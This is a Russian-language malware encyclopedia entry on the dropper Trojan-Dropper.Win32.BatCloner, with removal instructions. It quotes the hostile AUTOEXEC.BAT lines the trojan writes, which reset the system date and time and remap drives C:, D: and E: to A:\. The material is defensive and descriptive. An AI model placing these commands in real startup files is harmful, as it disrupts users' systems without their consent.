Trojan-Dropper.Win32.BatCloner

Материал из Total Malware Info

Перейти к: навигация, поиск

Trojan-Dropper.Win32.BatCloner Троянская программа, созданая для скрытой установки в систему других троянских программ. Программа является приложением Windows (PE EXE-файл). Имеет размер 24 562 байта. Написана на С++.

Деструктивная активность

Извлекает из своего тела файл "PDVL.BAT" и помещает его в корневом каталоге диска "С:": 

C:\PDVL.BAT (470 байт, детектируется Антивирусом Касперского как Virus.BAT.Clouner)

Кроме того перезаписывает файл "AUTOEXEC.BAT" следующими строками: 

time 00:00:00,00
date 80-01-01
%comspec% nul /f /c if exist e:\nul subst e: a:\
%comspec% nul /f /c if exist d:\nul subst d: a:\
%comspec% nul /f /c if exist c:\nul subst c: a:\

Первые две строки меняют время и дату на некорректные. Последние три строки создают виртуальные диски, указывающие на корневой каталог диска "А:"

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Удалить файл, созданный троянцем:
    3. C:\PDVL.BAT
  3. Удалить содержимое файла:
    4. C:\AUTOEXEC.BAT
Источник — «http://www.totalmalwareinfo.com/rus/Trojan-Dropper.Win32.BatCloner»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.